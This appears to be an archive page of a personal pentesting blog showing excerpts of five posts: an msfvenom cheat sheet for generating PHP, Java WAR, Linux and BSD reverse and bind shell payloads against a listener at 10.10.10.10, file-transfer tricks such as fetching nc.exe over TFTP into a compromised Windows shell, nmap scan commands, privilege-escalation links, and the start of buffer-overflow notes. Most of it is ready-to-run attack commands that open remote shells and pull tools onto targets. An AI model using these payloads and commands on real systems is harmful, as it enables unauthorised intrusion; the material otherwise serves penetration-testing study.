Month: January 2019

Total 5 Posts

msfvenom payload

PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o


File transfer methods

File Transfers
Limit commands on the shell to non-interactive ones.
https://blog.netspi.com/15-ways-to-download-a-file/
TFTP
Windows XP and Win 2003 contain a TFTP client. Windows 7 does not by default. TFTP clients are usually non-interactive, so they could work through an obtained shell.
atftpd --daemon --port 69 /tftp
Windows> tftp -i 10.10.10.10 GET nc.exe
FTP


Pentesting resources

The following are some resources, but I will update this as I find something interesting. These are by no means mine and I am just gathering good information from around the web. Credit goes to the original file content owner.
Windows privilege escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
Windows hacking pack: https://github.com/51x/WHP
Windows and Linux priv esc: https://github.com/AusJock/Privilege-Escalation
All


one stop shop-Pentesting

Scanning:
Nmap quick scan
nmap -sS -sV -vv -oA quick 10.10.10.10
Nmap full scan
nmap -sC -sV -p- -vv -oA full 10.10.10.10
UDP quick scan
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
SYN scan of all ports
nmap -sS --min-rate 5000 --max-retries 1 -p- 10.10.10.10
Unicornscan
unicornscan -i tap0 -p


Buffer Overflow

Buffer overflows are not simple. This post is my own notes; if it makes sense, feel free to use it.
Stack Overflow
Find a vulnerable program and possibly a starting skeleton script. Attach the program to Olly Debugger, and send a payload to crash the program. Now the fun starts.
Step 1: Finding and
